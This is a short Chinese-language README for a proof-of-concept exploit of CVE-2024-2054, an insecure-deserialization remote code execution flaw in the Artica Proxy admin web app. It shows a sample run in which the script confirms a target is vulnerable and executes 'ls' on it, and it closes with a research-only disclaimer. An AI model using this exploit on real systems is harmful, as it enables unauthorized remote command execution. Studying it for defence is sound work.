
CVE-2024-2054的概念验证漏洞利用,演示了Artica-Proxy管理Web应用程序中的不安全反序列化RCE。包括命令执行和漏洞验证。
针对 ARTICA PROXY 管理 Web 应用程序 CVE-2024-2054 的漏洞利用概念验证(PoC)
$ python3 CVE-2024-2054.py
Enter url: https://8X.XX.XX.X4:9000
Vulnerable
enter command: ls
assets
index.html
wiz.upload.php
wiz.wizard.php
wiz.wizard.progress.php
本 POC 纯粹出于学术研究和开发有效防御技术的目的而创建,除经明确授权外,不应用于攻击系统。项目创建者/维护者不对软件/POC 的滥用负责或承担责任。请负责任地使用。